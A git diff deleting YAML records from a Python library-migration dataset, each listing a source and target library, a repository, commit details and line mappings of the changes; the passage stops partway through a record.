a/v1/data/migration/5cb810e_pil,pillow.yaml b/v1/data/migration/5cb810e_pil,pillow.yaml deleted file mode 100644 index 7a43967..0000000 --- a/v1/data/migration/5cb810e_pil,pillow.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: 5cb810e_pil,pillow -source: pil -target: pillow -repo: getpelican/pelican-plugins -commit: 5cb810ebbd5204b6d4dbb6f2a6161219364c7f19 -pair_id: pil,pillow -commit_message: 'Fixed issue with images that had no alpha channel. New feature that - dynamically sizes image as part of watermark. - - - Refactored photos. Added watermark and blacklist. Fixed some bugs. Updated documentation - - - Updated documentation to include pillow' -commit_url: https://github.com/getpelican/pelican-plugins/commit/5cb810eb -code_changes: [] diff --git a/v1/data/migration/5ded32a_pycrypto,pycryptodome.yaml b/v1/data/migration/5ded32a_pycrypto,pycryptodome.yaml deleted file mode 100644 index baad1bb..0000000 --- a/v1/data/migration/5ded32a_pycrypto,pycryptodome.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 5ded32a_pycrypto,pycryptodome -source: pycrypto -target: pycryptodome -repo: cybercentrecanada/assemblyline-service-cuckoo -commit: 5ded32a52c92e7f3b89602ca3600fec9ac5a1662 -pair_id: pycrypto,pycryptodome -commit_message: Use pycryptodome instead of pycrypto -commit_url: https://github.com/cybercentrecanada/assemblyline-service-cuckoo/commit/5ded32a5 -code_changes: [] diff --git a/v1/data/migration/5eb6909_eventlet,gevent.yaml b/v1/data/migration/5eb6909_eventlet,gevent.yaml deleted file mode 100644 index ca137b0..0000000 --- a/v1/data/migration/5eb6909_eventlet,gevent.yaml +++ /dev/null @@ -1,11 +0,0 @@ -id: 5eb6909_eventlet,gevent -source: eventlet -target: gevent -repo: sc3/cookcountyjail -commit: 5eb69097a2476b09ce7dd7fff6dbd2c1af5830d6 -pair_id: eventlet,gevent -commit_message: 'Issue #249 - started on new scraper. 
- - Version version of Monitor and SearchCommands class' -commit_url: https://github.com/sc3/cookcountyjail/commit/5eb69097 -code_changes: [] diff --git a/v1/data/migration/5f2c76c_py-bcrypt,bcrypt.yaml b/v1/data/migration/5f2c76c_py-bcrypt,bcrypt.yaml deleted file mode 100644 index c5c39a8..0000000 --- a/v1/data/migration/5f2c76c_py-bcrypt,bcrypt.yaml +++ /dev/null @@ -1,12 +0,0 @@ -id: 5f2c76c_py-bcrypt,bcrypt -source: py-bcrypt -target: bcrypt -repo: pwnlandia/mhn -commit: 5f2c76c5a4d257ec46de8b653160d8a4549f657e -pair_id: py-bcrypt,bcrypt -commit_message: 'Upgrade py-bcrypt to bcrypt - - - Fixes issue #244 on GitHub.' -commit_url: https://github.com/pwnlandia/mhn/commit/5f2c76c5 -code_changes: [] diff --git a/v1/data/migration/5f4d92a_slackclient,slack-sdk.yaml b/v1/data/migration/5f4d92a_slackclient,slack-sdk.yaml deleted file mode 100644 index 0e00d5c..0000000 --- a/v1/data/migration/5f4d92a_slackclient,slack-sdk.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: 5f4d92a_slackclient,slack-sdk -source: slackclient -target: slack-sdk -repo: slackapi/python-slack-sdk -commit: 5f4d92a8048814fc4938753594e74d7cfc74c27a -pair_id: slackclient,slack-sdk -commit_message: Update the tutorial to be up-to-date with v3 -commit_url: https://github.com/slackapi/python-slack-sdk/commit/5f4d92a8 -code_changes: -- filepath: tutorial/PythOnBoardingBot/async_app.py - lines: - - 146:147 - - '42:43' - - 65:66 - - 94:95 - - 123:124 - - 7:7-8 -- filepath: tutorial/PythOnBoardingBot/app.py - lines: - - '4:4' diff --git a/v1/data/migration/633e7d1_gevent,eventlet.yaml b/v1/data/migration/633e7d1_gevent,eventlet.yaml deleted file mode 100644 index d117fa5..0000000 --- a/v1/data/migration/633e7d1_gevent,eventlet.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 633e7d1_gevent,eventlet -source: gevent -target: eventlet -repo: iqtlabs/poseidon -commit: 633e7d1b5b0c7f12a89bdb5504084f4f760a37eb -pair_id: gevent,eventlet -commit_message: use eventlet instead of gevent -commit_url: https://github.com/iqtlabs/poseidon/commit/633e7d1b -code_changes: [] diff --git a/v1/data/migration/6b0f04a_pycrypto,pycryptodome.yaml b/v1/data/migration/6b0f04a_pycrypto,pycryptodome.yaml deleted file mode 100644 index 0488d83..0000000 --- a/v1/data/migration/6b0f04a_pycrypto,pycryptodome.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 6b0f04a_pycrypto,pycryptodome -source: pycrypto -target: pycryptodome -repo: wh1te909/tacticalrmm -commit: 6b0f04a5b0b77d029cff0f16e0292d66116b9bdf -pair_id: pycrypto,pycryptodome -commit_message: replace pycrypto with newer pycryptodome -commit_url: https://github.com/wh1te909/tacticalrmm/commit/6b0f04a5 -code_changes: [] diff --git a/v1/data/migration/6b10345_kafka-python,confluent-kafka.yaml b/v1/data/migration/6b10345_kafka-python,confluent-kafka.yaml deleted file mode 100644 index c473c56..0000000 --- a/v1/data/migration/6b10345_kafka-python,confluent-kafka.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: 6b10345_kafka-python,confluent-kafka -source: kafka-python -target: confluent-kafka -repo: biznetgio/restknot -commit: 6b10345398630fbb418f84ca7268d481ecad56ee -pair_id: kafka-python,confluent-kafka -commit_message: 'Update: migrate to `confluent-kafka-python` - - - Works out-of-the-box for multiple Kafka brokers. - - Bonus: it''s faster and more maintained.' 
-commit_url: https://github.com/biznetgio/restknot/commit/6b103453 -code_changes: -- filepath: agent/dnsagent/clis/start.py - lines: - - 35:35-36 -- filepath: api/app/helpers/producer.py - lines: - - 18-21:18-20 - - 31:35-36 - - '5:5' diff --git a/v1/data/migration/6b629d0_flask-restplus,flask-restx.yaml b/v1/data/migration/6b629d0_flask-restplus,flask-restx.yaml deleted file mode 100644 index 5c50111..0000000 --- a/v1/data/migration/6b629d0_flask-restplus,flask-restx.yaml +++ /dev/null @@ -1,50 +0,0 @@ -id: 6b629d0_flask-restplus,flask-restx -source: flask-restplus -target: flask-restx -repo: orchest/orchest -commit: 6b629d0d0dc7d44113e75a8a3f97a1c68d2ee131 -pair_id: flask-restplus,flask-restx -commit_message: 'Replace ''flask_restplus'' with ''flask_restx'' - - - `flask_restplus'' is not longer actively maintained, whereas - - `flask_restx` is an actively maintained fork. - - - Fixes: #23' -commit_url: https://github.com/orchest/orchest/commit/6b629d0d -code_changes: -- filepath: services/orchest-api/app/app/apis/namespace_projects.py - lines: - - '6:6' -- filepath: services/orchest-api/app/app/apis/namespace_pipelines.py - lines: - - '6:6' -- filepath: services/orchest-api/app/app/apis/namespace_environment_builds.py - lines: - - '6:6' -- filepath: services/orchest-api/app/app/schema.py - lines: - - '9:9' -- filepath: services/orchest-api/app/app/apis/namespace_experiments.py - lines: - - '8:8' -- filepath: services/orchest-api/app/app/utils.py - lines: - - '8:8' -- filepath: services/orchest-api/app/app/apis/namespace_validations.py - lines: - - '7:7' -- filepath: services/orchest-api/app/app/apis/__init__.py - lines: - - '2:2' -- filepath: services/orchest-api/app/app/apis/namespace_sessions.py - lines: - - '5:5' -- filepath: services/orchest-api/app/app/apis/namespace_environment_images.py - lines: - - '4:4' -- filepath: services/orchest-api/app/app/apis/namespace_runs.py - lines: - - '11:11' diff --git a/v1/data/migration/6e7ee63_requests,aiohttp.yaml b/v1/data/migration/6e7ee63_requests,aiohttp.yaml deleted file mode 100644 index e8ebe98..0000000 --- a/v1/data/migration/6e7ee63_requests,aiohttp.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 6e7ee63_requests,aiohttp -source: requests -target: aiohttp -repo: epsagon/epsagon-kubernetes -commit: 6e7ee63ded228a139c4198bffb3f64675228f12e -pair_id: requests,aiohttp -commit_message: Watch based agent -commit_url: https://github.com/epsagon/epsagon-kubernetes/commit/6e7ee63d -code_changes: [] diff --git a/v1/data/migration/70b3abc_mysql-python,pymysql.yaml b/v1/data/migration/70b3abc_mysql-python,pymysql.yaml deleted file mode 100644 index 690058c..0000000 --- a/v1/data/migration/70b3abc_mysql-python,pymysql.yaml +++ /dev/null @@ -1,12 +0,0 @@ -id: 70b3abc_mysql-python,pymysql -source: mysql-python -target: pymysql -repo: rnacentral/rnacentral-webcode -commit: 70b3abc581fa5dbaabe9ffa7727cccec5433634e -pair_id: mysql-python,pymysql -commit_message: 'Use PyMySQL driver instead of MySQLdb - - - because PyMySQL is written in pure python and is easier to install' -commit_url: https://github.com/rnacentral/rnacentral-webcode/commit/70b3abc5 -code_changes: [] diff --git a/v1/data/migration/71aff3a_retrying,tenacity.yaml b/v1/data/migration/71aff3a_retrying,tenacity.yaml deleted file mode 100644 index 3701a7c..0000000 --- a/v1/data/migration/71aff3a_retrying,tenacity.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: 71aff3a_retrying,tenacity -source: retrying -target: tenacity -repo: intelai/inference-model-manager -commit: 71aff3a0bd1ae2a7d7d91858dcbe721de152693e 
-pair_id: retrying,tenacity -commit_message: Replace retrying with tenacity (#119) -commit_url: https://github.com/intelai/inference-model-manager/commit/71aff3a0 -code_changes: -- filepath: tests/management_api_tests/context.py - lines: - - '1:1' - - 70:70 - - 90:90 - - 107:107 -- filepath: management/management_api/tenants/tenants_utils.py - lines: - - 109:108 - - 129:128 - - '5:5' -- filepath: tests/conftest.py - lines: - - 120:120 - - '4:4' -- filepath: tests/management_api_tests/endpoints/endpoint_utils.py - lines: - - 108:108 - - '3:3' diff --git a/v1/data/migration/728f86e_django-rest-swagger,drf-yasg.yaml b/v1/data/migration/728f86e_django-rest-swagger,drf-yasg.yaml deleted file mode 100644 index c40cb6b..0000000 --- a/v1/data/migration/728f86e_django-rest-swagger,drf-yasg.yaml +++ /dev/null @@ -1,15 +0,0 @@ -id: 728f86e_django-rest-swagger,drf-yasg -source: django-rest-swagger -target: drf-yasg -repo: bcgov/theorgbook -commit: 728f86e941dfb6bdbee27628d28425757af5f22d -pair_id: django-rest-swagger,drf-yasg -commit_message: 'Use drf-yasg instead of django_rest_swagger - - - Signed-off-by: Nicholas Rempel ' -commit_url: https://github.com/bcgov/theorgbook/commit/728f86e9 -code_changes: -- filepath: tob-api/api_v2/swagger.py - lines: - - 6:7-8 diff --git a/v1/data/migration/7811c8f_eventlet,gevent.yaml b/v1/data/migration/7811c8f_eventlet,gevent.yaml deleted file mode 100644 index 92b493a..0000000 --- a/v1/data/migration/7811c8f_eventlet,gevent.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 7811c8f_eventlet,gevent -source: eventlet -target: gevent -repo: teamsempo/sempoblockchain -commit: 7811c8f9c0c4d75e6c7a24d597f613fb85b46361 -pair_id: eventlet,gevent -commit_message: swapping to gevent (#389) -commit_url: https://github.com/teamsempo/sempoblockchain/commit/7811c8f9 -code_changes: [] diff --git a/v1/data/migration/7ba8676_logbook,loguru.yaml b/v1/data/migration/7ba8676_logbook,loguru.yaml deleted file mode 100644 index 9eafb87..0000000 --- a/v1/data/migration/7ba8676_logbook,loguru.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: 7ba8676_logbook,loguru -source: logbook -target: loguru -repo: thombashi/tcconfig -commit: 7ba8676b3b9347ef15142bfeba30d611822c154d -pair_id: logbook,loguru -commit_message: Replace the logging library -commit_url: https://github.com/thombashi/tcconfig/commit/7ba8676b -code_changes: -- filepath: tcconfig/_logger.py - lines: - - 18,29:20 - - '6:10' diff --git a/v1/data/migration/7ea7ddb_flask,quart.yaml b/v1/data/migration/7ea7ddb_flask,quart.yaml deleted file mode 100644 index df7ee2b..0000000 --- a/v1/data/migration/7ea7ddb_flask,quart.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: 7ea7ddb_flask,quart -source: flask -target: quart -repo: synesthesiam/voice2json -commit: 7ea7ddb8400775282e82c1adcb17b013f27ede2b -pair_id: flask,quart -commit_message: Using quart for web interface -commit_url: https://github.com/synesthesiam/voice2json/commit/7ea7ddb8 -code_changes: -- filepath: web/app.py - lines: - - 100:102 - - 105:107 - - 166:172 - - 195:202 - - 235:243 - - 237:245 - - 242:250 - - '20:20' - - '28:28' - - 59:59-60 - - 95:96-97 - - 188:194-195 - - 212:219-220 diff --git a/v1/data/migration/813214e_slackclient,slack-sdk.yaml b/v1/data/migration/813214e_slackclient,slack-sdk.yaml deleted file mode 100644 index d5ee57e..0000000 --- a/v1/data/migration/813214e_slackclient,slack-sdk.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: 813214e_slackclient,slack-sdk -source: slackclient -target: slack-sdk -repo: slackapi/python-slack-events-api -commit: 813214e403c800722dd5a92449cb0a49b8b73abc 
-pair_id: slackclient,slack-sdk -commit_message: version 3.0.0 -commit_url: https://github.com/slackapi/python-slack-events-api/commit/813214e4 -code_changes: -- filepath: example/current_app/main.py - lines: - - '9:2' -- filepath: example/blueprint/example.py - lines: - - '12:2' -- filepath: example/example.py - lines: - - '2:2' -- filepath: example/working_with_proxy/example.py - lines: - - '12:2' diff --git a/v1/data/migration/85d50bb_pil,pillow.yaml b/v1/data/migration/85d50bb_pil,pillow.yaml deleted file mode 100644 index 814ca81..0000000 --- a/v1/data/migration/85d50bb_pil,pillow.yaml +++ /dev/null @@ -1,61 +0,0 @@ -id: 85d50bb_pil,pillow -source: pil -target: pillow -repo: learning-unlimited/esp-website -commit: 85d50bbb948c4486b943d2f594d033a1cbf99187 -pair_id: pil,pillow -commit_message: 'Fixes PIL dependency - - - Teachers without biography photos were generating 500 errors on their - - biography pages. This was happening with the assignment - - teacherbio.picture = ''images/not-available.jpg''. - - PIL was throwing the exception "decoder jpeg not available". - - - libjpeg-dev is a dependency for PIL jpeg decoder support. See - - . - - This is now added as a dependency. - - - The bug remained after making this change. Further investigation revealed that - - PIL does not easily support virtualenv. It looks for the jpeg decoder files in - - a fixed directory; see - - - - and . - - - PIL has not been updated since 2009, and it is unlikely that virtualenv - - support will be added. However, the Pillow package, a fork of PIL, does - - support virtualenv, and is under active development. See - - and . - - - This commit changes the dependency on PIL to a dependency on Pillow. After - - uninstalling PIL and installing Pillow, the bug is fixed. However, manage.py - - validate will complain about the lack of PIL. 
- - - If PIL is already installed in the virtualenv, the following commands must be - - run to uninstall PIL: - - $ source env/bin/activate - - $ pip uninstall PIL' -commit_url: https://github.com/learning-unlimited/esp-website/commit/85d50bbb -code_changes: [] diff --git a/v1/data/migration/86244b6_pyqt5,pyside6.yaml b/v1/data/migration/86244b6_pyqt5,pyside6.yaml deleted file mode 100644 index 5e258ac..0000000 --- a/v1/data/migration/86244b6_pyqt5,pyside6.yaml +++ /dev/null @@ -1,97 +0,0 @@ -id: 86244b6_pyqt5,pyside6 -source: pyqt5 -target: pyside6 -repo: toufool/auto-split -commit: 86244b6c190f48200826788fa6af4bd8d26b230f -pair_id: pyqt5,pyside6 -commit_message: Python 3.9 + PyQt6 -commit_url: https://github.com/toufool/auto-split/commit/86244b6c -code_changes: -- filepath: src/AutoSplit.py - lines: - - '4:4' - - 139:141 - - 164:166 - - 617:619 - - 680:682 - - 881:883 - - 968:961 -- filepath: src/resources_rc.py - lines: - - '9:6' -- filepath: src/settings_file.py - lines: - - '2:2' -- filepath: src/error_messages.py - lines: - - '2:2' -- filepath: src/about.py - lines: - - '9:9' - - '32:34' - - '48:50' - - '77:79' -- filepath: src/screen_region.py - lines: - - '1:1' - - 224:227 - - 229-230:232-233 - - 257-258:260-261 - - 268:271 - - 273:276 - - 277:280 -- filepath: src/menu_bar.py - lines: - - '2:2' -- filepath: src/design.py - lines: - - '9:9' - - '29:31' - - '37:39' - - '40:42' - - '52:54' - - 77:79 - - 90:92 - - 94:96 - - 98:100 - - 102:104 - - 109:111 - - 155:157 - - 172:174 - - 176:178 - - 180:182 - - 184:186 - - 188:190 - - 192:194 - - 194:196 - - 198:200 - - 200:202 - - 204:206 - - 206:208 - - 210:212 - - 212:214 - - 216:218 - - 218:220 - - 222:224 - - 224:226 - - 228:230 - - 230:232 - - 234:236 - - 236:238 - - 240:242 - - 242:244 - - 249:251 - - 251:253 - - 262:264 - - 308:310 - - 312:314 - - 317:319 - - 326:328 - - 365:367 - - 373:375 - - 456:458 - - 458:460 - - 460:462 - - 462:464 - - 464:466 - - 561:563 diff --git a/v1/data/migration/8778a80_pil,pillow.yaml b/v1/data/migration/8778a80_pil,pillow.yaml deleted file mode 100644 index 43d892d..0000000 --- a/v1/data/migration/8778a80_pil,pillow.yaml +++ /dev/null @@ -1,12 +0,0 @@ -id: 8778a80_pil,pillow -source: pil -target: pillow -repo: django-wiki/django-wiki -commit: 8778a806c038dc4e1a602e3094b518896b3db112 -pair_id: pil,pillow -commit_message: 'Replace PIL with Pillow - - - Somehow PIL is not making Travis very happy atm.' 
-commit_url: https://github.com/django-wiki/django-wiki/commit/8778a806 -code_changes: [] diff --git a/v1/data/migration/87a5671_xlrd,openpyxl.yaml b/v1/data/migration/87a5671_xlrd,openpyxl.yaml deleted file mode 100644 index d85d43d..0000000 --- a/v1/data/migration/87a5671_xlrd,openpyxl.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 87a5671_xlrd,openpyxl -source: xlrd -target: openpyxl -repo: oeg-upm/mapeathor -commit: 87a5671e807b70b06dbb00dc8e297aee61b1632b -pair_id: xlrd,openpyxl -commit_message: xlrd bug fixed -commit_url: https://github.com/oeg-upm/mapeathor/commit/87a5671e -code_changes: [] diff --git a/v1/data/migration/89b64c6_raven,sentry-sdk.yaml b/v1/data/migration/89b64c6_raven,sentry-sdk.yaml deleted file mode 100644 index 210f913..0000000 --- a/v1/data/migration/89b64c6_raven,sentry-sdk.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: 89b64c6_raven,sentry-sdk -source: raven -target: sentry-sdk -repo: stencila/hub -commit: 89b64c61cf613c8feb301146edb23a461f153e3d -pair_id: raven,sentry-sdk -commit_message: 'fix(Error logging): Upgrade to sentry-sdk; use message for migrations, - not exception - - - Closes #336 and #350' -commit_url: https://github.com/stencila/hub/commit/89b64c61 -code_changes: [] diff --git a/v1/data/migration/89c7afc_pymilvus-orm,pymilvus.yaml b/v1/data/migration/89c7afc_pymilvus-orm,pymilvus.yaml deleted file mode 100644 index dbcb7af..0000000 --- a/v1/data/migration/89c7afc_pymilvus-orm,pymilvus.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: 89c7afc_pymilvus-orm,pymilvus -source: pymilvus-orm -target: pymilvus -repo: milvus-io/bootcamp -commit: 89c7afc6548362e9bbf1dbf6142aabb02bc3bb93 -pair_id: pymilvus-orm,pymilvus -commit_message: update benchmark test script for Milvus 2.0.0-rc5 -commit_url: https://github.com/milvus-io/bootcamp/commit/89c7afc6 -code_changes: -- filepath: benchmark_test/scripts/milvus_helpers.py - lines: - - 2-5,7:2 - - 98:96 diff --git a/v1/data/migration/8d0ec68_retrying,tenacity.yaml b/v1/data/migration/8d0ec68_retrying,tenacity.yaml deleted file mode 100644 index b942a51..0000000 --- a/v1/data/migration/8d0ec68_retrying,tenacity.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: 8d0ec68_retrying,tenacity -source: retrying -target: tenacity -repo: pokainc/cfn-cross-region-export -commit: 8d0ec687838ea69612d7b1236e2341198aef7937 -pair_id: retrying,tenacity -commit_message: 'Fix: Add retry logic to prevent throttling issue when listing exports - (#13)' -commit_url: https://github.com/pokainc/cfn-cross-region-export/commit/8d0ec687 -code_changes: -- filepath: importer/lambda/cross_region_importer.py - lines: - - '10:10' diff --git a/v1/data/migration/8ef3b62_flask-restful,flask-restplus.yaml b/v1/data/migration/8ef3b62_flask-restful,flask-restplus.yaml deleted file mode 100644 index a32e211..0000000 --- a/v1/data/migration/8ef3b62_flask-restful,flask-restplus.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: 8ef3b62_flask-restful,flask-restplus -source: flask-restful -target: flask-restplus -repo: ziirish/burp-ui -commit: 8ef3b624e52ac6a9420c533b0dd744a36d91c4d3 -pair_id: flask-restful,flask-restplus -commit_message: use flask-restplus -commit_url: https://github.com/ziirish/burp-ui/commit/8ef3b624 -code_changes: -- filepath: burpui/api/client.py - lines: - - '13:13' -- filepath: burpui/api/restore.py - lines: - - '18:18' -- filepath: burpui/api/__init__.py - lines: - - '14:14' -- filepath: burpui/api/misc.py - lines: - - '15:15' -- filepath: burpui/api/servers.py - lines: - - '8:8' -- filepath: burpui/api/settings.py - lines: - - '14:14' -- filepath: burpui/api/clients.py - 
lines: - - '15:15' diff --git a/v1/data/migration/902b66d_pil,pillow.yaml b/v1/data/migration/902b66d_pil,pillow.yaml deleted file mode 100644 index 9e153f3..0000000 --- a/v1/data/migration/902b66d_pil,pillow.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 902b66d_pil,pillow -source: pil -target: pillow -repo: gml16/rl-medical -commit: 902b66dfcb506bae0c9f4ac4a69dc4a1f22cec9e -pair_id: pil,pillow -commit_message: Fixed requirement from PIL to pillow -commit_url: https://github.com/gml16/rl-medical/commit/902b66df -code_changes: [] diff --git a/v1/data/migration/9291b54_pycryptodome,pycryptodomex.yaml b/v1/data/migration/9291b54_pycryptodome,pycryptodomex.yaml deleted file mode 100644 index 3cc7cf4..0000000 --- a/v1/data/migration/9291b54_pycryptodome,pycryptodomex.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: 9291b54_pycryptodome,pycryptodomex -source: pycryptodome -target: pycryptodomex -repo: malwaredllc/byob -commit: 9291b54ed6a1c727030c571a6ebdf7b344781c8f -pair_id: pycryptodome,pycryptodomex -commit_message: 'Suggest change to pycryptodomex vs pycryptodome Crypto hooks - - - In preparation for pyinstaller or similar compilation tools as it would - - be beneficial to migrate to the more explicit Cryptodome namespace due - - to a notable lack of support for pycryptodome hooks in pyinstaller.' -commit_url: https://github.com/malwaredllc/byob/commit/9291b54e -code_changes: -- filepath: byob/modules/ransom.py - lines: - - 68:68 - - 131:131 - - 187:187 - - 212:212 - - 75:75 - - 132-133:132-133 - - 188:188 - - 213:213 -- filepath: byob/core/security.py - lines: - - 20-23:20-23 - - '41:41' - - 43-44:43-44 - - '46:46' - - 64:64 - - 85:85 - - 84:84 diff --git a/v1/data/migration/936761f_dataproperty,typepy.yaml b/v1/data/migration/936761f_dataproperty,typepy.yaml deleted file mode 100644 index 127298e..0000000 --- a/v1/data/migration/936761f_dataproperty,typepy.yaml +++ /dev/null @@ -1,14 +0,0 @@ -id: 936761f_dataproperty,typepy -source: dataproperty -target: typepy -repo: thombashi/datetimerange -commit: 936761f779c4f7dc8c2d4c03c47b6e7b6e978a89 -pair_id: dataproperty,typepy -commit_message: Add timestamp as support input value types -commit_url: https://github.com/thombashi/datetimerange/commit/936761f7 -code_changes: -- filepath: datetimerange/__init__.py - lines: - - '11:13' - - 457-458:465-466 - - 484-485:498-499 diff --git a/v1/data/migration/963f347_gcloud-aio-core,aiohttp.yaml b/v1/data/migration/963f347_gcloud-aio-core,aiohttp.yaml deleted file mode 100644 index 9e7a271..0000000 --- a/v1/data/migration/963f347_gcloud-aio-core,aiohttp.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: 963f347_gcloud-aio-core,aiohttp -source: gcloud-aio-core -target: aiohttp -repo: talkiq/gcloud-aio -commit: 963f34706918757ab7d3cbad70c363b9a48b9d40 -pair_id: gcloud-aio-core,aiohttp -commit_message: 'refactor(datastore): remove core.http dependency' -commit_url: https://github.com/talkiq/gcloud-aio/commit/963f3470 -code_changes: -- filepath: datastore/gcloud/aio/datastore/datastore.py - lines: - - 142:154-157 - - '5:4' diff --git a/v1/data/migration/9abf7b1_slackclient,slack-sdk.yaml b/v1/data/migration/9abf7b1_slackclient,slack-sdk.yaml deleted file mode 100644 index ee0a0da..0000000 --- a/v1/data/migration/9abf7b1_slackclient,slack-sdk.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: 9abf7b1_slackclient,slack-sdk -source: slackclient -target: slack-sdk -repo: alice-biometrics/petisco -commit: 9abf7b1f6ef8c55bdddcb9a5c2eff513f6a93130 -pair_id: slackclient,slack-sdk -commit_message: 'Fix rabbitmq bugs (connector argument position) 
(#167) - - - * Fix rabbitmq bugs (connector argument position) - - - * Update SlackNotifiers and Converters. Add channel.confirm_delivery() on MessageBuses - - - * Fix typo (Uncontrolled Exception instead of Uncontroller Exception)' -commit_url: https://github.com/alice-biometrics/petisco/commit/9abf7b1f -code_changes: -- filepath: petisco/legacy/notifier/infrastructure/slack/slack_notifier.py - lines: - - 1-2:1-2 -- filepath: petisco/extra/slack/is_slack_available.py - lines: - - '3:3' -- filepath: petisco/extra/slack/application/notifier/slack_notifier.py - lines: - - 3-4:3-4 diff --git a/v1/data/migration/9c85d66_pil,pillow.yaml b/v1/data/migration/9c85d66_pil,pillow.yaml deleted file mode 100644 index 42086db..0000000 --- a/v1/data/migration/9c85d66_pil,pillow.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 9c85d66_pil,pillow -source: pil -target: pillow -repo: thunder-project/thunder -commit: 9c85d66c14f1c7b39e8efd39dd7fba9163d7efca -pair_id: pil,pillow -commit_message: Replaced PIL with pillow -commit_url: https://github.com/thunder-project/thunder/commit/9c85d66c -code_changes: [] diff --git a/v1/data/migration/a4c347a_eventlet,gevent.yaml b/v1/data/migration/a4c347a_eventlet,gevent.yaml deleted file mode 100644 index 5157af8..0000000 --- a/v1/data/migration/a4c347a_eventlet,gevent.yaml +++ /dev/null @@ -1,12 +0,0 @@ -id: a4c347a_eventlet,gevent -source: eventlet -target: gevent -repo: stefal/rtkbase -commit: a4c347a2ede5fba1d0e787193b7dc4079ab4fd6f -pair_id: eventlet,gevent -commit_message: 'Temporary workaround to #22' -commit_url: https://github.com/stefal/rtkbase/commit/a4c347a2 -code_changes: -- filepath: web_app/server.py - lines: - - 28-29:26-27 diff --git a/v1/data/migration/a50812d_flask-security,flask-security-too.yaml b/v1/data/migration/a50812d_flask-security,flask-security-too.yaml deleted file mode 100644 index 1401917..0000000 --- a/v1/data/migration/a50812d_flask-security,flask-security-too.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: a50812d_flask-security,flask-security-too -source: flask-security -target: flask-security-too -repo: italomaia/flask-empty -commit: a50812d36c5249ac2a1cd7e580283de06d2aa727 -pair_id: flask-security,flask-security-too -commit_message: 'Migrating dependency on flask-security to flask-security-too - - - As seen in https://github.com/mattupstate/flask-security/issues/822 flask-security - - became abandonware. A fork mantained by jwag956 seems to handle the project''s continuity. - - I took a look in the source code and it seems to be properly maintained.' 
-commit_url: https://github.com/italomaia/flask-empty/commit/a50812d3 -code_changes: [] diff --git a/v1/data/migration/a5c04bb_requests,aiohttp.yaml b/v1/data/migration/a5c04bb_requests,aiohttp.yaml deleted file mode 100644 index 09beb6c..0000000 --- a/v1/data/migration/a5c04bb_requests,aiohttp.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: a5c04bb_requests,aiohttp -source: requests -target: aiohttp -repo: talkpython/async-techniques-python-course -commit: a5c04bbd9b5614a8fc0317050c01e4c241b1b41d -pair_id: requests,aiohttp -commit_message: fully async flask app based on quart and aiohttp -commit_url: https://github.com/talkpython/async-techniques-python-course/commit/a5c04bbd -code_changes: -- filepath: src/10-async-web/acityscape_api/services/location_service.py - lines: - - '4:5' - - 21:22-23 - - '24:26' -- filepath: src/10-async-web/acityscape_api/services/weather_service.py - lines: - - '1:1' - - 13:13-14 - - '16:17' -- filepath: src/10-async-web/acityscape_api/services/sun_service.py - lines: - - '5:5' - - 21:21-22 - - '24:24' diff --git a/v1/data/migration/a688034_flask-restplus,flask-restx.yaml b/v1/data/migration/a688034_flask-restplus,flask-restx.yaml deleted file mode 100644 index ea08d8a..0000000 --- a/v1/data/migration/a688034_flask-restplus,flask-restx.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: a688034_flask-restplus,flask-restx -source: flask-restplus -target: flask-restx -repo: cycat-project/cycat-service -commit: a6880349b111f7a111d6d9163dde664251eaa0e4 -pair_id: flask-restplus,flask-restx -commit_message: 'fix: [requirements] flask-restx added' -commit_url: https://github.com/cycat-project/cycat-service/commit/a6880349 -code_changes: [] diff --git a/v1/data/migration/a7375cc_celery,rq.yaml b/v1/data/migration/a7375cc_celery,rq.yaml deleted file mode 100644 index f3235b1..0000000 --- a/v1/data/migration/a7375cc_celery,rq.yaml +++ /dev/null @@ -1,12 +0,0 @@ -id: a7375cc_celery,rq -source: celery -target: rq -repo: sapfir0/premier-eye -commit: a7375ccc40885f04faf4a05852591e6de4ba676d -pair_id: celery,rq -commit_message: "\u041F\u0435\u0440\u0435\u0434\u0435\u043B\u0430\u043A\u0430" -commit_url: https://github.com/sapfir0/premier-eye/commit/a7375ccc -code_changes: -- filepath: pyfront/app/__init__.py - lines: - - '2:3' diff --git a/v1/data/migration/a7f4c3f_pymilvus-orm,pymilvus.yaml b/v1/data/migration/a7f4c3f_pymilvus-orm,pymilvus.yaml deleted file mode 100644 index b202f6d..0000000 --- a/v1/data/migration/a7f4c3f_pymilvus-orm,pymilvus.yaml +++ /dev/null @@ -1,12 +0,0 @@ -id: a7f4c3f_pymilvus-orm,pymilvus -source: pymilvus-orm -target: pymilvus -repo: milvus-io/bootcamp -commit: a7f4c3f13e007116d88d9a2776f471a4e4f1fc81 -pair_id: pymilvus-orm,pymilvus -commit_message: update qa-chatbot to Milvus2.0.0-rc5 -commit_url: https://github.com/milvus-io/bootcamp/commit/a7f4c3f1 -code_changes: -- filepath: solutions/question_answering_system/quick_deploy/server/src/milvus_helpers.py - lines: - - 2-5,7:2 diff --git a/v1/data/migration/aa607bd_flask,quart.yaml b/v1/data/migration/aa607bd_flask,quart.yaml deleted file mode 100644 index cd68187..0000000 --- a/v1/data/migration/aa607bd_flask,quart.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: aa607bd_flask,quart -source: flask -target: quart -repo: 